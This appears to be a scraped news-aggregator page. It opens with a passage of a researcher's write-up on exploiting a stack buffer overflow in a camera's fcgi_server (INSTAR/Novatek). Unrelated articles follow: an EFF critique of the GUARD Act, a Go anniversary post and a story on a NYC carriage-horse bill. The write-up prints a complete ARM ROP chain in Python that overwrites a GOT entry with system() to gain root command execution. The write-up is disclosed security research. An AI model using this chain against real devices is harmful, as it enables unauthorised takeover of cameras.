* Request completely sent off
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
* TLSv1.3 (IN), TLS handshake, Newsession Ticket (4):
< HTTP/2 500
< content-type: text/html
[...]
< server: lighttpd/1.4.72
<
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
 <head>
  <title>500 Internal Server Error</title>
 </head>
 <body>
  <h1>500 Internal Server Error</h1>
 </body>
</html>

I got back another 500. However, the response wasn’t the same, this time it included an HTML error message. Strange, right? Let’s have a look at what the serial terminal showed.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
Hardware name: Novatek Video Platform
PC is at 0x41414140
LR is at 0x76e39e8c
pc : [<41414140>]    lr : [<76e39e8c>]    psr: 60010030
sp : 753808d0  ip : 76e6f48c  fp : 41414141
r10: 41414141  r9 : 41414141  r8 : 41414141
r7 : 41414141  r6 : 41414141  r5 : 41414141  r4 : 41414141
r3 : 00000000  r2 : 75380698  r1 : 00000000  r0 : 75380698
Flags: nZCv  IRQs on  FIQs on  Mode USER_32  ISA Thumb  Segment user
Control: 10c5387d  Table: 4dbdc04a  DAC: 00000055
CPU: 1 PID: 6392 Comm: fcgi_server Tainted: P           O      4.19.91 #1
Hardware name: Novatek Video Platform
Backtrace:
[<8010b428>] (dump_backtrace) from [<8010b554>] (show_stack+0x18/0x1c)
 r7:41414140 r6:60070013 r5:00000000 r4:808405e4
[...]

What happened? The program had crashed. PC is at 0x41414140 indicates that I had overwritten the stack since the code took the return address from the stack and tried jumping to it. In this case 0x41414140 which corresponds to the payload sent. I had found a stack-based buffer overflow.

Why hadn’t I discovered this vulnerability during my initial fuzzing? I figured there were two reasons:

  • The HTTP status code was the same as for a normal request, only the response body differed. So getting a 500 response to the request was nothing unusual.
  • The lighttpd server immediately restarted fcgi_server , so the crash wasn’t noticeable from an outside perspective.

This once again highlights the importance of a proper debugging setup.

Exploitation

Before we jump to the fun part, a quick heads up: If you’re not familiar with binary exploitation or the ARM architecture I’d recommend to have a look at the previous blog post 5 first as many concepts are similar to those from the previous research and won’t be described in detail in this post.

Let’s first discuss the preconditions of exploiting the discovered stack-based buffer overflow. We’re dealing with an ARMHF 32 bit binary, dynamically linked and stripped. As shown by checksec the target binary isn’t protected by stack canaries, but does have the NX mitigation enabled. It isn’t compiled as a position independent executable (PIE) and has partial relocation read-only (RELRO).

1
2
$ file fcgi_server
fcgi_server: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux-armhf.so.3, for GNU/Linux 4.9.0, stripped
1
2
3
$ checksec --file=fcgi_server
RELRO           STACK CANARY      NX            PIE
Partial RELRO   No canary found   NX enabled    No PIE

What does this mean for us as attackers? Overwriting return addresses on the stack with an overflow is straightforward because of the lack of stack canaries. However, we can’t execute shellcode on the stack. Also, the binary will always be placed in the same memory region, because it wasn’t compiled as a PIE. Finally, partial RELRO means that the global offset table (GOT) comes before the BSS section in memory, which holds uninitialized global and static variables. This eliminates the risk of a buffer overflow from a global variable overwriting GOT entries 6 . Since our overflow is on the stack, this doesn’t really matter to us. What does matter though, is that it also means that the GOT is writable. Only full RELRO provides a read-only GOT.

Let’s also have a look at the libraries included by the target binary such as the libc. We can see that libc was compiled with PIE, meaning that it can be placed randomly in memory during runtime.

1
2
3
$ checksec --file=libc-2.29.so
RELRO           STACK CANARY      NX            PIE
Partial RELRO   Canary found      NX enabled    DSO

Evidently, when looking at the mitigations in place, it makes sense to consider a Return-oriented programming (ROP) chain to achieve command execution. A ROP chain leverages small code snippets, or gadgets, already present in a program’s memory. By linking these gadgets, an attacker constructs an unintended, attacker-controlled execution flow. The effectiveness of a ROP chain depends on the availability of suitable gadgets and the attacker’s knowledge of their memory addresses.

In our case we could use gadgets from the target binary ( fcgi_server ) itself because their addresses are static and therefore known. These gadgets are quite limited though and eventually we would need to call file I/O functions or system() provided by libc to gain command execution. Note that libc was compiled with PIE. I quickly confirmed on the device that address space layout randomization (ASLR) was enabled, so libc was indeed placed at a random address in memory.

I came up with a couple of ideas on how to deal with this:

  • Find a libc address leak through another vulnerability
  • Find a file read for /proc/self/maps
  • Leak a libc address through a ROP chain

Unfortunately, I couldn’t quickly find another vulnerability that would let me leak a libc address. I considered reading /proc/self/maps to locate libc, but that proved unsuccessful. I also looked into using gadgets in the target binary to build a ROP chain to leak a libc address. However, there was no straightforward way to exfiltrate the leaked pointer.

A bigger issue was that any ROP chain would eventually crash the binary, rendering the leak useless because libc would be relocated on the next start of fcgi_server . In a stack-based buffer overflow, it’s also impossible to restore the stack to its previous state, as the very information required for restoration is overwritten.

One approach often used in this kind of scenario is to trigger the bug multiple times to prolong the crash: trigger it once to leak an address, then return to the vulnerable function and trigger the overflow again to make use of the leak. However, that approach requires an I/O channel to read the leak and then supply input again. Given the web-stack architecture we discussed and the bug’s location, that wasn’t feasible, so I concluded a one-shot exploit was likely the only viable option.

The Plan

There are several known techniques that revolve around the GOT and Procedure Linkage Table (PLT) to bypass ASLR. When a call to an external function such as puts (libc) is made, the immediate call goes to puts@plt which acts as a resolver of the actual address of puts within libc. The resolved address is then stored in the GOT. If a specific function has already been resolved previously it is taken from the GOT by the puts@plt stub 7 .

So the information needed to bypass ASLR lives in the GOT. Ideally we’d find the address of system there, but the target binary never references system , so it has no GOT/PLT entry. Instead, we could read a GOT entry for another function, compute the offset from that function to our target, and use that to redirect execution to the target. But all of this must be done via a ROP chain built from gadgets available in the binary.

The high level steps would look something like this:

  • Read a GOT entry and store in register x
  • Increment/decrement register x to reach target function (eg. addition, multiply, etc.)
  • Jump to x

Or another approach:

  • Increment/decrement value pointed to by GOT pointer to reach target function (GOT is writable)
  • Dereference GOT pointer into register x
  • Jump to x

Still a vast simplification, we would still need to move arguments into the correct registers and so on before jumping to the target function system() but it’s a starting point.

Finding the Pieces

To pursue this idea I first wanted to find a GOT entry that is already populated when triggering the vulnerability. Within the vulnerable base64 decode function there is a call to isalnum which is a libc function. Let’s have a look at its PLT and GOT entries.

Using objdump we can see the address of the PLT entry inside fcgi_server of isalnum

1
2
3
4
objdump -d fcgi_server| grep '<isalnum@plt>'
000147e8 <isalnum@plt>:
   206c8:       ebffd046        bl      147e8 <isalnum@plt>
   21010:       ebffcdf4        bl      147e8 <isalnum@plt>

To verify the corresponding GOT entry and actual address at runtime I set a breakpoint at the return statement after the overflow.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
(remote) gef➤  info address isalnum@got.plt
Symbol "isalnum@got.plt" is at 0x400c8 in a file compiled without debugging.
(remote) gef➤  x/wx 0x400c8
0x400c8 <isalnum@got.plt>:      0x76ba86f0
(remote) gef➤  x/8i 0x76ba86f0
   0x76ba86f0 <isalnum>:        ldr     r3, [pc, #24]   @ 0x76ba8710 <isalnum+32>
   0x76ba86f4 <isalnum+4>:      mrc     15, 0, r2, cr13, cr0, {3}
   0x76ba86f8 <isalnum+8>:      lsl     r0, r0, #1
   0x76ba86fc <isalnum+12>:     ldr     r3, [pc, r3]
   0x76ba8700 <isalnum+16>:     ldr     r3, [r2, r3]
   0x76ba8704 <isalnum+20>:     ldrh    r0, [r3, r0]
   0x76ba8708 <isalnum+24>:     and     r0, r0, #8
   0x76ba870c <isalnum+28>:     bx      lr

As you can see the GOT entry is at 0x400c8 which points to the actual address of isalnum at 0x76ba86f0 within libc.

1
2
3
4
5
6
7
8
9
(remote) gef➤  info function system
All functions matching regular expression "system":

Non-debugging symbols:
0x000147c4  std::_V2::system_category()@plt
[...]
0x76bbb920  __libc_system
0x76bbb920  system
0x76c83fac  svcerr_systemerr

Let’s see how far apart that isalnum (0x76ba86f0) and system (0x76bbb920) are.

1
2
>>> hex(0x76bbb920 - 0x76ba86f0)
'0x13230'

So that means that if we can add 0x13230 to the address at isalnum@got we have the address of system .

Gadgets, Gadgets and more Gadgets

Now to the tedious part. The only thing between the high-level plan and RCE was a bunch of gadgets, right? I initially tried tools such as angrop 8 to find and automatically chain gadgets, but ARM assembly offers many different, often multi-instruction ways to perform simple operations, e.g. add to a register or move values between registers. Those tools handle obvious, straightforward gadgets well, but they struggle once the gadget sequences become more complex. So in the end I reverted to manually searching and chaining gadgets with Ropper 9 .

If no short, straightforward gadgets are available, you must resort to longer ones. Typically, the longer a gadget is, the more side effects it has, for example, overwriting registers or changing the stack pointer. The challenge is therefore to find gadgets that implement the required primitive while introducing only manageable side effects that later gadgets can correct.

The most crucial gadget in my chain was the one to add two values, preferably fully controllable. This would let me add the calculated offset to the address at isalnum@got to get the address of system . While there were a couple of gadgets to add static values like 0x1 or 0x2 to a register, these didn’t seem very useful because either a loop would be required to call them many times or the chain would become too long to reach the desired value. So I tried to find gadgets that added values from two registers such as the following one.

# 0x000228d8: add r6, fp, r6; ldrb sb, [ip, #1]; ldr sl, [ip, #2]; blx r3;

Let’s break that down:

  • add r6, fp, r6 : Adds fp (r11) and r6, stores result in r6
  • ldrb sb, [ip, #1] : Dereferences ip (r12) + 1 byte, stores result in sb (r9)
  • ldr sl, [ip, #2] : Dereferences ip (r12) + 2 word, stores result in sl (r10)
  • blx r3 : Jumps to r3

As you can see here side effects can also mean that certain registers have to contain certain values beforehand. In this case ip (r12) has to contain a valid address that can be dereferenced. If that’s not the case, the program will crash.

So we have a gadget that allows us to add fp (r11) and r6. Ideally we want the address of isalnum in r6 and the offset we calculated earlier in fp (r11) giving us the address of system in r6 as an output of the gadget. But how do we get the address of isalnum into r6? The address of isalnum@got is known so we need a gadget to dereference it to obtain the address of isalnum within libc.

To accomplish this, let’s have a look at this gadget:

# 0x000190ac: ldr r6, [r3, #0x10]; ldr r3, [r2, #4]; blx r3;

Breakdown:

  • ldr r6, [r3, #0x10] : Dereferences (r3 + 0x10), stores result in r6
  • ldr r3, [r2, #4] : Dereferences (r2 + 0x4), stores result in r3
  • blx r3; : Jumps to r3

Exactly what we need, but as you can tell this gadget needs some specific preparation beforehand. To continue the chain with blx r3 we need to make sure *(r2 + 0x4) results in the next gadget of the chain. But that should be doable.

Last but not least we need a gadget to jump to the calculated address. Unfortunately I simply couldn’t find one. I also couldn’t find ways of moving the address into another register for which call gadgets would exist. So where to go from here? I recalled that the GOT of the target binary is actually writable. So what about writing it back to the GOT? If that works we could just call isalnum@plt which would then load the altered address from the GOT and jump to it.

Let’s try, here’s another gadget:

# 0x0002a3f8: str r0, [r4, #4]; pop {r4, r5, r6, pc};

Breakdown:

  • str r0, [r4, #4] : Dereferences (r4 + 0x4) and stores value of r0
  • pop {r4, r5, r6, pc} : Continues the chain

This gadget enables us to store a value in r0 at *(r4 + 0x4) . Given that we find gadgets to move our calculated address into r0 and isalnum@got - 0x4 into r4 this allows us to write the tampered address back to the GOT.

So if we could make everything line up the plan would be:

  • Dereference isalnum@got entry and store it in r6
  • Add the calculated offset to system to the register r6
  • Write the register r6 back to the GOT -> isalnum@got
  • Prepare function arguments for system
  • Call isalnum@plt

Building the Chain

The path wasn’t as straightforward as this write-up might imply. I spent quite some time trying to mix and match gadgets and even exchanged the ones discussed above numerous times until I came up with the following chain. Let me walk you through it.

The function epilogue of the vulnerable base64 function conveniently allows us to populate r4 to r11 before jumping to the first gadget. So in this case I added some values to r6, r9 and r11 for later use.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
p = b""
p += 516 * b"A"
p += b"BBBB" # r4
p += b"CCCC" # r5
p += p32(0x1cad0) # r6
p += b"EEEE" # r7
p += b"FFFF" # r8
p += p32(0x190ac) # r9 (sb)
p += b"HHHH" # r10 (sl)
p += p32(0x13230) # r11 (fp) -> offset system - isalnum

As a first step of the chain, we do some preparations.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
# 0x00028a08: mov r0, r6; pop {r4, r5, r6, pc};
p += p32(0x28a08)
p += b"XXXX" # r4
p += b"XXXX" # r5
p += b"XXXX" # r6

# 0x0001459c: pop {r3, pc};
p += p32(0x1459c)
p += p32(ISALNUM_GOT - 0x10) # r3

# 0x0002a33c: mov r2, sp; str r0, [sp, #4]; mov r0, r3; blx sb;
p += p32(0x2a33c)
p += b"AAAA" # <- sp

What we do here is basically this:

1
2
3
4
5
6
r0 = r6 = 0x1cad0
r3 = ISALNUM_GOT - 0x10
r2 = sp
*(sp + 4) = r0 = 0x1cad0
r0 = r3 = ISALNUM_GOT - 0x10
*(0x190ac)()

Note that we store isalnum@got in r3 so the following gadget can dereference it into r6. As discussed before we have to make sure that r2 contains a stack pointer so the chain can continue with blx r3 .

1
# 0x000190ac: ldr r6, [r3, #0x10]; ldr r3, [r2, #4]; blx r3;
1
2
3
r6 = *(r3 + 0x10) = *(ISALNUM_GOT - 0x10 + 0x10) = *ISALNUM_GOT
r3 = *(r2 + 0x4) = *(sp + 0x4)
*(sp + 0x4)() # -> 0x1cad0

As shown above *(sp + 0x4) is overwritten at runtime, so we need to make sure there is some scratch space on the stack so everything adds up properly.

When jumping to the gadget at 0x1cad0 the stack looks like this:

Address Value
0x1000FFF8 0x1459c
0x1000FFF4 0x1cad0
0x1000FFF0 AAAA <- stack pointer

The stack pointer still points at the AAAA value. So we continue with some readjustments of the stack pointer and preparations of the r3 register.

1
2
3
4
5
6
# 0x0001cad0: pop {r4, r5, pc};
p += b"XXXX" # r5 (scratch space)

# 0x0001459c: pop {r3, pc};
p += p32(0x1459c)
p += p32(0x27d14) # r3

Next up is the discussed gadget to add isalnum ’s address an the calculated offset. The offset was already put into fp (r11) at the very beginning of the chain. Register r6 also contains isalnum ’s real address read from the GOT by now.

1
2
# 0x000228d8: add r6, fp, r6; ldrb sb, [ip, #1]; ldr sl, [ip, #2]; blx r3;
p += p32(0x228d8)
1
2
3
4
r6 = r6 + fp = *ISALNUM_GOT + 0x13230 = system
sb = *(ip + 0x1)
sl = *(ip + 0x2)
*(0x27d14)()

The ip register can be disregarded as it won’t be used later and conveniently contained an address that points to the stack. Since we’re just reading from it, it also doesn’t invoke any undesirable side effects.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
# 0x00027d14: mov r0, r6; add sp, sp, #0x3c; pop {r4, r5, r6, r7, r8, sb, sl, fp, pc};
p += 0x3c * b"P"
p += p32(ISALNUM_GOT - 4) # r4 -> target - 4
p += b"XXXX" # r5
p += b"XXXX" # r6
p += b"XXXX" # r7
p += b"XXXX" # r8
p += b"XXXX" # sb
p += b"XXXX" # sl
p += b"XXXX" # fp

As a next step we have a gadget that moves r6 into r0. So we move the calculated address (= system ) into r0. Also, we prepare the r4 register for the next step. To deal with the side effects of this gadget some more padding is added.

1
2
3
r0 = r6 = system
sp = sp + 0x3c
r4 = ISALNUM_GOT - 4

Finally, we reach the gadget that writes our calculated system address back to the GOT.

1
2
3
4
5
# 0x0002a3f8: str r0, [r4, #4]; pop {r4, r5, r6, pc};
p += p32(0x2a3f8)
p += b"XXXX" # r4
p += b"XXXX" # r5
p += p32(ISALNUM_PLT) # r6

To our convenience it also allows us to write isalnum@plt to r6.

1
2
*(r4 + 0x4) = r0 = *(ISALNUM_GOT - 0x4 + 0x4) = system
r6 = ISALNUM_PLT

From here there isn’t much left to do. We move the stack pointer into r0 (first argument) and then call r6 which we previously populated with the address of system .

1
2
3
4
# 0x0001fb04: mov r0, sp; blx r6;
p += p32(0x1fb04)
p += CMD.encode()
p += b"\x00"

Let’s test things out:

Final exploit to gain a root shell on target device

RCE!

Why Didn’t You Just … ?

Attentive readers might have noticed this is a 32-bit binary, so why not just brute-force the address of system() ? This was indeed possible because the address space for 32-bit systems is significantly less than for 64-bit therefore the number of possible locations of libc is also a lot smaller. I used this approach for the first version of the exploit which worked fine. However, while probing for the correct address the exploit keeps crashing the target binary. If we think about a red team scenario this approach would be very noisy and should therefore be avoided. That’s why I decided to work out a more reliable exploit.

Wrapping up

We’ve now walked the full path from firmware extraction and analysis, through vulnerability identification, and exploitation. I hope reading this was as enjoyable for you as the actual research was for me.

All vulnerabilities discovered during this research were reported through a responsible-disclosure process. Thanks to INSTAR for their prompt response, they fixed the issues and released an update within a short period of time. The 90-day disclosure period has elapsed, and along with this write-up the exploit is now publicly available here .

Other News

A Surveillance Mandate Disguised As Child Safety: Why the GUARD Act Won't Keep Us Safe

Electronic Frontier Foundation
www.eff.org
2025-11-14 22:34:18
A new bill sponsored by Sen. Hawley (D-MO), Sen. Blumenthal (D-CT), Sen. Britt (R-AL), Sen. Warner (D-VA), and Sen. Murphy (D-CT) would require AI chatbots to verify all users’ ages, prohibit minors from using AI tools, and implement steep criminal penalties for chatbots that promote or solicit cert...
Original Article

A new bill sponsored by Sen. Hawley (D-MO), Sen. Blumenthal (D-CT), Sen. Britt (R-AL), Sen. Warner (D-VA), and Sen. Murphy (D-CT) would require AI chatbots to verify all users’ ages, prohibit minors from using AI tools, and implement steep criminal penalties for chatbots that promote or solicit certain harms. That might sound reasonable at first, but behind those talking points lies a sprawling surveillance and censorship regime that would reshape how people of all ages use the internet.

The GUARD Act may look like a child-safety bill, but in practice it’s an age-gating mandate that could be imposed on nearly every public-facing AI chatbot.

The GUARD Act may look like a child-safety bill, but in practice it’s an age-gating mandate that could be imposed on nearly every public-facing AI chatbot—from customer-service bots to search-engine assistants. The GUARD Act could force countless AI companies to collect sensitive identity data, chill online speech, and block teens from using the digital tools that they rely on every day.

EFF has warned for years that age-verification laws endanger free expression, privacy, and competition. There are legitimate concerns about transparency and accountability in AI, but the GUARD Act’s sweeping mandates are not the solution.

TAKE ACTION

TELL CONGRESS: The guard act won't keep us safe

Young People's Access to Legitimate AI Tools Could Be Cut Off Entirely.

The GUARD Act doesn’t give parents a choice—it simply blocks minors from AI companions altogether. If a chat system’s age-verification process determines that a user is under 18, that user must then be locked out completely. The GUARD Act contains no parental consent mechanism, no appeal process for errors in age estimation, and no flexibility for any other context.

The bill’s definition of an AI “companion” is ambiguous enough that it could easily be interpreted to extend beyond general-use LLMs like ChatGPT, causing overcautious companies to block young people from other kinds of AI services too. In practice, this means that under the GUARD Act, teenagers may not be able to use chatbots to get help with homework, seek customer service assistance for a product they bought, or even ask a search engine a question. It could also cut off all young people’s access to educational and creative tools that have quickly become a part of everyday learning and life online.

The GUARD Act’s sponsors claim these rules will keep our children safe, but that’s not true.

By treating all young people—whether seven or seventeen—the same, the GUARD Act threatens their ability to explore their identities, get answers to questions free from shame or stigma, and gradually develop a sense of autonomy as they mature into adults. Denying teens’ access to online spaces doesn’t make them safer , it just keeps them uninformed and unprepared for adult life.

The GUARD Act’s sponsors claim these rules will keep our children safe, but that’s not true. Instead, it will undermine both safety and autonomy by replacing parental guidance with government mandates and building mass surveillance infrastructure instead of privacy controls.

All Age Verification Systems Are Dangerous. This Is No Different.

Teens aren’t the only ones who lose out under the GUARD Act. The bill would require platforms to confirm the ages of all users—young and old—before allowing them to speak, learn, or engage with their AI tools.

Under the GUARD Act, platforms can’t rely on a simple “I’m over 18” checkbox or self-attested birthdate. Instead, they must build or buy a “commercially reasonable” age-verification system that collects identifying information (like a government ID, credit record, or biometric data) from every user before granting them access to the AI service. Though the GUARD Act does contain some data minimization language, its mandate to periodically re-verify users means that platforms must either retain or re-collect that sensitive user data as needed. Both of those options come with major privacy risks.

EFF has long documented the dangers of age-verification systems:

  • They create attractive targets for hackers. Third-party services that collect users’ sensitive ID and biometric data for the purpose of age verification have been repeatedly breached , exposing millions to identity theft and other harms.
  • They implement mass surveillance systems and ruin anonymity . To verify your age, a system must determine and record who you are. That means every chatbot interaction could feasibly be linked to your verified identity.
  • They disproportionately harm vulnerable groups. Many people—especially activists and dissidents, trans and gender-nonconforming folks, undocumented people, and survivors of abuse—avoid systems that force identity disclosure. The GUARD Act would entirely cut off their ability to use these public AI tools.
  • They entrench Big Tech . Only the biggest companies can afford the compliance and liability burden of mass identity verification. Smaller, privacy-respecting developers simply can’t compete.

As we’ve said repeatedly, there’s no such thing as “safe” age verification. Every approach—whether it’s facial or biometric scans , government ID uploads, or behavioral or account analysis—creates new privacy, security, and expressive harms.

Vagueness + Steep Fines = Censorship. Full Stop.

Though mandatory age-gates provide reason enough to oppose the GUARD Act, the definitions of “AI chatbot” and “AI companion” are also vague and broad enough to raise alarms. In a nutshell, the Act’s definitions of these two terms are so expansive that they could cover nearly any system capable of generating “human-like” responses including not just general-purpose LLMs like ChatGPT, but also more tailored services like those used for customer service interactions, search-engine summaries, and subject-specific research tools.

The bill defines an “AI chatbot” as any service that produces “adaptive” or “context-responsive” outputs that aren’t fully predetermined by a developer or operator. That could include Google’s search summaries, research tools like Perplexity, or any AI-powered Q&A tool—all of which respond to natural language prompts and dynamically generate conversational text.

Meanwhile, the GUARD Act’s definition of an “AI companion”—a system that both produces “adaptive” or “context-responsive” outputs and encourages or simulates “interpersonal or emotional interaction”—will easily sweep in general-purpose tools like ChatGPT. Courts around the country are already seeing claims that conversational AI tools manipulate users’ emotions to increase engagement. Under this bill, that’s enough to trigger the “AI companion” label, putting AI developers at risk even when they do not intend to cause harm.

Both of these definitions are imprecise and unconstitutionally overbroad. And, when combined with the GUARD Act’s incredibly steep fines (up to $100,000 per violation, enforceable by the federal Attorney General and every state AG), companies worried about their legal liability will inevitably err on the side of prohibiting minors from accessing their chat systems. The GUARD Act leaves them these options: censor certain topics en masse, entirely block users under 18 from accessing their services, or implement broad-sweeping surveillance systems as a prerequisite to access. No matter which way platforms choose to go, the inevitable result for users is less speech, less privacy, and less access to genuinely helpful tools.

How You Can Help

While there may be legitimate problems with AI chatbots, young people’s safety is an incredibly complex social issue both on- and off-line. The GUARD Act tries to solve this complex problem with a blunt, dangerous solution.

In other words, protecting young people’s online safety is incredibly important, but to do so by forcing invasive ID checks, criminalizing AI tools, and banning teens from legitimate digital spaces is not a good way out of this.

The GUARD Act would make the internet less free, less private, and less safe for everyone.

The GUARD Act would make the internet less free, less private, and less safe for everyone. It would further consolidate power and resources in the hands of the bigger AI companies, crush smaller developers, and chill innovation under the threat of massive fines. And it would cut off vulnerable groups’ ability to use helpful everyday AI tools, further stratifying the internet we know and love.

Lawmakers should reject the GUARD Act and focus instead on policies that provide transparency, more options for users, and comprehensive privacy for all. Help us tell Congress to oppose the GUARD Act today.

Join EFF Lists

Go's Sweet 16

Hacker News
go.dev
2025-11-14 22:33:15
Comments...
Original Article

This past Monday, November 10th, we celebrated the 16th anniversary of Go’s open source release !

We released Go 1.24 in February and Go 1.25 in August , following our now well-established and dependable release cadence. Continuing our mission to build the most productive language platform for building production systems, these releases included new APIs for building robust and reliable software, significant advances in Go’s track record for building secure software, and some serious under-the-hood improvements. Meanwhile, no one can ignore the seismic shifts in our industry brought by generative AI. The Go team is applying its thoughtful and uncompromising mindset to the problems and opportunities of this dynamic space, working to bring Go’s production-ready approach to building robust AI integrations, products, agents, and infrastructure.

Core language and library improvements

First released in Go 1.24 as an experiment and then graduated in Go 1.25, the new testing/synctest package significantly simplifies writing tests for concurrent, asynchronous code . Such code is particularly common in network services, and is traditionally very hard to test well. The synctest package works by virtualizing time itself. It takes tests that used to be slow, flaky, or both, and makes them easy to rewrite into reliable and nearly instantaneous tests, often with just a couple extra lines of code. It’s also a great example of Go’s integrated approach to software development: behind an almost trivial API, the synctest package hides a deep integration with the Go runtime and other parts of the standard library.

This isn’t the only boost the testing package got over the past year. The new testing.B.Loop API is both easier to use than the original testing.B.N API and addresses many of the traditional—and often invisible!— pitfalls of writing Go benchmarks. The testing package also has new APIs that make it easy to cleanup in tests that use Context , and that make it easy to write to the test’s log.

Go and containerization grew up together and work great with each other. Go 1.25 launched container-aware scheduling , making this pairing even stronger. Without developers having to lift a finger, this transparently adjusts the parallelism of Go workloads running in containers, preventing CPU throttling that can impact tail latency and improving Go’s out-of-the-box production-readiness.

Go 1.25’s new flight recorder builds on our already powerful execution tracer, enabling deep insights into the dynamic behavior of production systems. While the execution tracer generally collected too much information to be practical in long-running production services, the flight recorder is like a little time machine, allowing a service to snapshot recent events in great detail after something has gone wrong.

Secure software development

Go continues to strengthen its commitment to secure software development, making significant strides in its native cryptography packages and evolving its standard library for enhanced safety.

Go ships with a full suite of native cryptography packages in the standard library, which reached two major milestones over the past year. A security audit conducted by independent security firm Trail of Bits yielded excellent results , with only a single low-severity finding. Furthermore, through a collaborative effort between the Go Security Team and Geomys , these packages achieved CAVP certification, paving the way for full FIPS 140-3 certification . This is a vital development for Go users in certain regulated environments. FIPS 140 compliance, previously a source of friction due to the need for unsupported solutions, will now be seamlessly integrated, addressing concerns related to safety, developer experience, functionality, release velocity, and compliance.

The Go standard library has continued to evolve to be safe by default and safe by design . For example, the os.Root API—added in Go 1.24—enables traversal-resistant file system access , effectively combating a class of vulnerabilities where an attacker could manipulate programs into accessing files intended to be inaccessible. Such vulnerabilities are notoriously challenging to address without underlying platform and operating system support, and the new os.Root API offers a straightforward, consistent, and portable solution.

Under-the-hood improvements

In addition to user-visible changes, Go has made significant improvements under the hood over the past year.

For Go 1.24, we completely redesigned the map implementation , building on the latest and greatest ideas in hash table design. This change is completely transparent, and brings significant improvements to map performance, lower tail latency of map operations, and in some cases even significant memory wins.

Go 1.25 includes an experimental and significant advancement in Go’s garbage collector called Green Tea . Green Tea reduces garbage collection overhead in many applications by at least 10% and sometimes as much as 40%. It uses a novel algorithm designed for the capabilities and constraints of today’s hardware and opens up a new design space that we’re eagerly exploring. For example, in the forthcoming Go 1.26 release, Green Tea will achieve an additional 10% reduction in garbage collector overhead on hardware that supports AVX-512 vector instructions—something that would have been nigh impossible to take advantage of in the old algorithm. Green Tea will be enabled by default in Go 1.26; users need only upgrade their Go version to benefit.

Furthering the software development stack

Go is about far more than the language and standard library. It’s a software development platform, and over the past year, we’ve also made four regular releases of the gopls language server , and have formed partnerships to support emerging new frameworks for agentic applications.

Gopls provides Go support to VS Code and other LSP-powered editors and IDEs. Every release sees a litany of features and improvements to the experience of reading and writing Go code (see the v0.17.0 , v0.18.0 , v0.19.0 , and v0.20.0 release notes for full details, or our new gopls feature documentation !). Some highlights include many new and enhanced analyzers to help developers write more idiomatic and robust Go code; refactoring support for variable extraction, variable inlining, and JSON struct tags; and an experimental built-in server for the Model Context Protocol (MCP) that exposes a subset of gopls’ functionality to AI assistants in the form of MCP tools.

With gopls v0.18.0, we began exploring automatic code modernizers . As Go evolves, every release brings new capabilities and new idioms; new and better ways to do things that Go programmers have been finding other ways to do. Go stands by its compatibility promise —the old way will continue to work in perpetuity—but nevertheless this creates a bifurcation between old idioms and new idioms. Modernizers are static analysis tools that recognize old idioms and suggest faster, more readable, more secure, more modern replacements, and do so with push-button reliability. What gofmt did for stylistic consistency , we hope modernizers can do for idiomatic consistency. We’ve integrated modernizers as IDE suggestions, where they can help developers not only maintain more consistent coding standards, but where we believe they will help developers discover new features and keep up with the state of the art. We believe modernizers can also help AI coding assistants keep up with the state of the art and combat their proclivity to reinforce outdated knowledge of the Go language, APIs, and idioms. The upcoming Go 1.26 release will include a total overhaul of the long-dormant go fix command to make it apply the full suite of modernizers in bulk, a return to its pre-Go 1.0 roots .

At the end of September, in collaboration with Anthropic and the Go community, we released v1.0.0 of the official Go SDK for the Model Context Protocol (MCP) . This SDK supports both MCP clients and MCP servers, and underpins the new MCP functionality in gopls. Contributing this work in open source helps empower other areas of the growing open source agentic ecosystem built around Go, such as the recently released Agent Development Kit (ADK) for Go from Google . ADK Go builds on the Go MCP SDK to provide an idiomatic framework for building modular multi-agent applications and systems. The Go MCP SDK and ADK Go demonstrate how Go’s unique strengths in concurrency, performance, and reliability differentiate Go for production AI development and we are expecting more AI workloads to be written in Go in the coming years.

Looking ahead

Go has an exciting year ahead of it.

We’re working on advancing developer productivity through the brand new go fix command, deeper support for AI coding assistants, and ongoing improvements to gopls and VS Code Go. General availability of the Green Tea garbage collector, native support for Single Instruction Multiple Data (SIMD) hardware features, and runtime and standard library support for writing code that scales even better to massive multicore hardware will continue to align Go with modern hardware and improve production efficiency. We’re focusing on Go’s “production stack” libraries and diagnostics, including a massive (and long in the making) upgrade to encoding/json , driven by Joe Tsai and people across the Go community; leaked goroutine profiling , contributed by Uber’s Programming Systems team; and many other improvements to net/http , unicode , and other foundational packages. We’re working to provide well-lit paths for building with Go and AI, evolving the language platform with care for the evolving needs of today’s developers, and building tools and capabilities that help both human developers and AI assistants and systems alike.

On this 16th anniversary of Go’s open source release, we’re also looking to the future of the Go open source project itself. From its humble beginnings , Go has formed a thriving contributor community. To continue to best meet the needs of our ever-expanding user base, especially in a time of upheaval in the software industry, we’re working on ways to better scale Go’s development processes—without losing sight of Go’s fundamental principles—and more deeply involve our wonderful contributor community.

Go would not be where it is today without our incredible user and contributor communities. We wish you all the best in the coming year!

The Bill to Ban Carriage Horses Is Dead

hellgate
hellgatenyc.com
2025-11-14 22:29:07
"To bring us here on a Friday for a shotgun vote is just not how you do business in the City Council."...
Original Article

A bill that would ban horse-drawn carriages in Central Park was defeated in committee on Friday, after the bill's main sponsor invoked an obscure City Council rule to force the committee to discuss it.

The City Council's Health Committee—which, because of the unusual way it was convened, did not include an opportunity for public comment—was called for by Queens Councilmember Bob Holden, the lead sponsor of Ryder's Law.

Holden, who does not sit on the Health Committee, opened his remarks with a quote from Mahatma Gandhi: "The greatness of a society can be judged by the way its animals are treated." He then lambasted his council colleagues for failing to consider his bill, which he first proposed in 2022.

"This committee chose not to have a hearing on this bill for four years. That's a disgrace," Holden said. "There's discrimination going on here. We know it, and it's disgusting." Holden then motioned to schedule a public hearing—and when Queens Councilmember Lynn Schulman, the Health Committee chair, replied that committee members were going to give comment instead, Holden insisted he would file an injunction for discrimination.

